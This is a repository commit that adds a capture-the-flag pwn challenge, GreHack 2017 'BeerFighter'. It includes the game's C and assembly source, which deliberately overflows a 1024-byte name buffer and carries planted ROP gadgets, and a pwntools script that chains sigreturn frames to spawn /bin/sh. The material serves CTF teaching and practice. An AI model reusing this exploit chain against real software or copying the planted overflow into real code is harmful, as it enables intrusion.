nganhkhoa/CTF-All-In-One
1
0
Fork 0
mirror of https://github.com/nganhkhoa/CTF-All-In-One.git synced 2025-06-24 04:05:03 +07:00
Code Issues Projects Releases Wiki Activity

finish 6.1.5

Browse Source
This commit is contained in:
firmianay
2017-11-24 10:57:02 +08:00
parent 4b6c272230
commit 2a535943e8
20 changed files with 688 additions and 12 deletions
Download Patch File Download Diff File Expand all files Collapse all files

40
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/Makefile Normal file
View File

@ -0,0 +1,40 @@
SRC_DIR = src
INC_DIR = inc
OBJ_DIR = obj
BIN_DIR = bin
OUT_DIR = $(OBJ_DIR) $(BIN_DIR)
CC = gcc
LD = gcc
INC = -I $(INC_DIR)
DEBUGFLAG=-g
CFLAGS= $(INC) -nostdlib -fno-stack-protector -Wl,-z,relro,-z,now,-z,noexecstack -static -Wno-builtin-declaration-mismatch -s
LDFLAGS= -nostdlib -fno-stack-protector -Wl,-z,relro,-z,now,-z,noexecstack -static -Wno-builtin-declaration-mismatch -s
MKDIR_P = mkdir -p
.PHONY: directories
OBJ_FILES = $(OBJ_DIR)/main.o $(OBJ_DIR)/io.o $(OBJ_DIR)/strings.o $(OBJ_DIR)/lib.o
ASM_FILES = $(SRC_DIR)/syscalls.S $(SRC_DIR)/start.S $(SRC_DIR)/gadgets.S
TARGET = $(BIN_DIR)/aaaaaa
all: directories $(TARGET)
directories: $(OUT_DIR)
$(OUT_DIR):
$(MKDIR_P) $(OUT_DIR)
$(TARGET): $(OBJ_FILES)
$(LD) $(LDFLAGS) $(OBJ_FILES) $(ASM_FILES) -o $(TARGET)
$(OBJ_DIR)/%.o : $(SRC_DIR)/%.c $(INC_DIR)/*.h
$(CC) $(CFLAGS) -c $< -o $@
.PHONY: clean
clean:
rm -f $(TARGET) $(OBJ_FILES) $(BIN_DIR)/*

9
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/README.md Normal file
View File

@ -0,0 +1,9 @@
# Exploit 250
Category: Exploit
Points: 250
Author: Valno
Description:
> Play the game at: www.myabandonware.com:5500

56
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/exp.py Normal file
View File

@ -0,0 +1,56 @@
from pwn import *
elf = ELF('./game')
io = process('./game')
io.recvuntil("> ")
io.sendline("1")
io.recvuntil("> ")
io.sendline("0")
io.recvuntil("> ")
context.clear()
context.arch = "amd64"
data_addr = elf.get_section_by_name('.data').header.sh_addr + 0x10
base_addr = data_addr + 0x8 # new stack address
# useful gadget
pop_rax_addr = 0x00000000004007b2 # pop rax ; ret
syscall_addr = 0x000000000040077f # syscall ;
# sigreturn syscall
sigreturn = p64(pop_rax_addr)
sigreturn += p64(constants.SYS_rt_sigreturn) # 0xf
sigreturn += p64(syscall_addr)
# frame_2: execve to get shell
frame_2 = SigreturnFrame()
frame_2.rax = constants.SYS_execve
frame_2.rdi = data_addr
frame_2.rsi = 0
frame_2.rdx = 0
frame_2.rip = syscall_addr
# frame_1: read frame_2 to .data
frame_1 = SigreturnFrame()
frame_1.rax = constants.SYS_read
frame_1.rdi = constants.STDIN_FILENO
frame_1.rsi = data_addr
frame_1.rdx = len(str(frame_2))
frame_1.rsp = base_addr # stack pivot
frame_1.rip = syscall_addr
payload_1 = "A" * 1048
payload_1 += sigreturn
payload_1 += str(frame_1)
io.sendline(payload_1)
io.recvuntil("> ")
io.sendline("3")
payload_2 = "/bin/sh\x00"
payload_2 += sigreturn
payload_2 += str(frame_2)
io.sendline(payload_2)
io.interactive()

BIN
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/game Executable file
View File

Binary file not shown.

28
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/inc/io.h Normal file
View File

@ -0,0 +1,28 @@
#ifndef __IO_H__
#define __IO_H__
#include "types.h"
#include "syscall_constants.h"
#include "syscalls.h"
#define STDIN 0
#define STDOUT 1
#define STDERR 2
static intptr write(int fd, void const* data, uintptr nbytes);
uintptr strlen(char const* str);
uintptr puts(char const* str);
intptr read(int fd, char* buf, uintptr count);
int getchar(void);
char* gets(char* str);
char* fgets(char *str, int n, int stream);
int getdigit(char *inputphrase, int a, int b);
#endif

26
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/inc/lib.h Normal file
View File

@ -0,0 +1,26 @@
#ifndef __LIB__H_
#define __LIB_H__
#include "syscall_constants.h"
#include "strings.h"
#include "io.h"
#define SIZEBUF 2048
#define SIZENAME 1024
struct Character{
char name[SIZENAME];
unsigned int level;
};
void city_hall(struct Character* perso);
void welcome_message();
int village_place(struct Character* perso);
void bar();
void champion();
#endif

6
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/inc/strings.h Normal file
View File

@ -0,0 +1,6 @@
#ifndef __STRINGS_H__
#define __STRINGS_H__
char* strncpy(char* dest, const char* src, int n);
#endif

7
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/inc/syscall_constants.h Normal file
View File

@ -0,0 +1,7 @@
#ifndef __SYSCALL_CONSTANTS_H__
#define __SYSCALL_CONSTANTS_H__
#define SYS_read 0
#define SYS_write 1
#endif

17
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/inc/syscalls.h Normal file
View File

@ -0,0 +1,17 @@
#ifndef __SYSCALLS_H__
#define __SYSCALLS_H__
#include <types.h>
void* syscall0(
uintptr number
);
void* syscall3(
uintptr number,
void* arg1,
void* arg2,
void* arg3
);
#endif

7
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/inc/types.h Normal file
View File

@ -0,0 +1,7 @@
#ifndef __TYPES_H__
#define __TYPES_H__
typedef unsigned long int uintptr; /* size_t */
typedef long int intptr; /* ssize_t */
#endif

27
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/src/gadgets.S Normal file
View File

@ -0,0 +1,27 @@
.intel_syntax noprefix
.intel_syntax noprefix
inc rdi
ret
xor rdi, rdi
ret
pop rsi
ret
and rdx, rsi
ret
and rcx, rsi
ret
pop r8
ret
pop rax
ret
mov dword ptr [rsi], r8d
ret

75
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/src/io.c Normal file
View File

@ -0,0 +1,75 @@
#include "io.h"
static intptr write(int fd, void const* data, uintptr nbytes){
return (intptr) syscall3(
SYS_write, /* SYS_write */
(void*)(intptr) fd,
(void*)data,
(void*)nbytes
);
}
uintptr strlen(char const* str){
char const *p;
for(p=str; *p; p++);
return p - str;
}
uintptr puts(char const* str){
return write(STDOUT, str, strlen(str));
}
intptr read(int fd, char* buf, uintptr count){
return (intptr) syscall3(
SYS_read,
(void*)(intptr) fd,
(void*) buf,
(void*) count
);
}
int getchar(void){
char c[1];
read(STDIN, c, 1);
return (int) c[0];
}
char* gets(char* str){
char c;
char *r = str;
for(c=getchar(); c != '\n' && c != '\0'; str++, c=getchar()){
*str = c;
}
*str = '\0';
return r;
}
char* fgets(char *str, int n, int stream){
char c=getchar();
int i = 0;
char *r = str;
char d[2];
while(c != '\n'){
if(i<n-1){
*str = c;
str++;
}
i++;
c = getchar();
}
*str = '\0';
return r;
}
int getdigit(char *inputphrase, int a, int b){
char str[3];
puts(inputphrase);
fgets(str, 3, STDIN);
while(strlen(str) != 1 || str[0]>57-9+b || str[0]<48+a){
puts("Invalid number, try again.\n");
puts(inputphrase);
fgets(str, 3, STDIN);
puts("\n");
}
return str[0]-48;
}

144
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/src/lib.c Normal file
View File

@ -0,0 +1,144 @@
#include "lib.h"
void welcome_message(){
char *message = "\n"
"__________________________________\n"
"\n"
"--- Welcome in BeerFigher III ---\n"
"__________________________________\n"
"\n"
"You just arrived in the small village of Foo in\n"
"the country, after a long day of travel.\n"
"Thirsty, you could just go and grab a beer at the\n"
"bar. You may also go in the city hall and get\n"
"registered with the mayor.\n"
"\n"
"\n";
puts(message);
}
void city_hall(struct Character* perso){
char digit;
char name[SIZEBUF];
puts("Welcome ");
puts(perso->name);
puts("! I am the mayor of this small town and my role is to register the names of its citizens.\nHow should I call you?\n");
puts("[0] Tell him your name\n");
puts("[1] Leave\n");
digit = getdigit("Type your action number > ", 0, 1);
switch(digit){
case 0:
puts("Type your character name here > ");
fgets(name, SIZEBUF, STDIN);
strncpy(perso->name, name, SIZEBUF);
puts("\n");
break;
case 1:
puts("You just left the old man without even saying \"Good bye\"\n");
break;
default:
puts("Invalid action\n");
break;
}
}
int village_place(struct Character* perso){
char *message = "\n\n"
" ~ ~~ __\n"
" _T .,,. ~--~ ^^\n"
" ^^ // \\ ~\n"
" ][O] ^^ ,-~ ~\n"
" /''-I_I _II____\n"
" __/_ / \\ ______/ '' /'\\_,__\n"
" | II--'''' \\,--:--..,_/,.-{ },\n"
" ; '/__\\,.--';| |[] .-.| O{ _ }\n"
" :' | | [] -| ''--:.;[,.'\\,/\n"
" ' |[]|,.--'' '', ''-,. |\n"
" .. ..-'' ; ''. '\n"
"\n"
"You are in the village square.\n"
"In front of you can see the entrance of the local\n"
"bar from where one could hear laughter and singing.\n"
"On your\n"
"left stands is the massive front of the city hall that\n"
"dominates the village. On your right, in the \n"
"shadow of the bar, an alley filled with unconscious bodies and\n"
"empty pints leads to a dark yard where the most\n"
"valiant barflies of the country can face each other.\n"
"It's time to choose in which place you will enter !\n"
"------------\n\n";
char *choice0 = "[0] The bar\n";
char *choice1 = "[1] The City Hall\n";
char *choice2 = "[2] The dark yard\n";
char *choice3 = "[3] Leave the town for ever\n";
puts(message);
puts(choice0);
puts(choice1);
puts(choice2);
puts(choice3);
int digit = getdigit("Type your action number > ", 0, 3);
switch(digit){
case 0:
bar();
break;
case 1:
city_hall(perso);
break;
case 2:
champion();
break;
case 3:
puts("By !\n");
return 0;
break;
default:
puts("Invalid choice\n");
break;
}
return 1;
}
void bar(){
char digit;
char *message = "\n\n"
" _.._..,_,_ \n"
" ( )\n"
" ]~,\"-.-~~[ Welcome in Foo bar\n"
" .=])' (; ([ ---\n"
" | ]:: ' [ We are currently close\n"
" '=]): .) ([ Please, come back later\n"
" |:: ' |\n"
" ~~----~~\n"
"\n\n";
puts(message);
puts("[0] Leave\n");
digit = getdigit("Type your action number > ", 0, 0);
switch(digit){
case 0:
puts("You just left the bar\n");
break;
default:
puts("Invalid action\n");
break;
}
}
void champion(){
char digit;
puts("\n\n-- Feature currently in development...\n\n");
puts("[0] Leave\n");
digit = getdigit("Type your action number > ", 0, 0);
switch(digit){
case 0:
puts("You just left the yard\n");
break;
default:
puts("Invalid action\n");
break;
}
}

16
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/src/main.c Normal file
View File

@ -0,0 +1,16 @@
#include "syscalls.h"
#include "io.h"
#include "lib.h"
char a[6] = {5, 8, 7, 6, 2, 7};
int main(int argc, char **argv){
struct Character perso = { "Newcomer", 0};
welcome_message();
while(village_place(&perso));
puts("\n");
return 0;
}

18
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/src/start.S Normal file
View File

@ -0,0 +1,18 @@
.intel_syntax noprefix
.text
.globl _start
_start:
xor rbp, rbp /* rbp = 0 */
pop rdi /* rdi = argc */
mov rsi, rsp /*rsi = (char*) argv[] */
and rsp, -16 /* last 4 bytes of rsp to 0 */
call main
mov rdi, rax /* syscall param 1 = return value of main */
mov rax, 60 /* SYS_exit */
syscall
ret

10
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/src/strings.c Normal file
View File

@ -0,0 +1,10 @@
#include "strings.h"
char* strncpy(char* dest, const char* src, int n){
char* r = dest;
for(int i=0; i<n; i++, src++, dest++)
*dest = *src;
*dest = 0;
return r;
}

17
src/writeup/6.1.5_pwn_grehackctf2017_beerfighter/src/syscalls.S Normal file
View File

@ -0,0 +1,17 @@
.intel_syntax noprefix
.text
.globl syscall0, syscall1, syscall2, syscall3, syscall4, syscall5
syscall0:
mov rax, rdi /* rax (syscall number) = function param 1 (rdi) */
syscall /* enter syscall */
ret
syscall3:
mov rax, rdi /* rax (syscall number) = function param 1 (rdi) */
mov rdi, rsi /* rdi (syscall param 1) = func param 2 (rsi) */
mov rsi, rdx /* rsi (syscall param 2) = func param 3 (rdx) */
mov rdx, rcx /* rdx (syscall param 3) = func param 4 (rcx) */
syscall /* enter syscall */
ret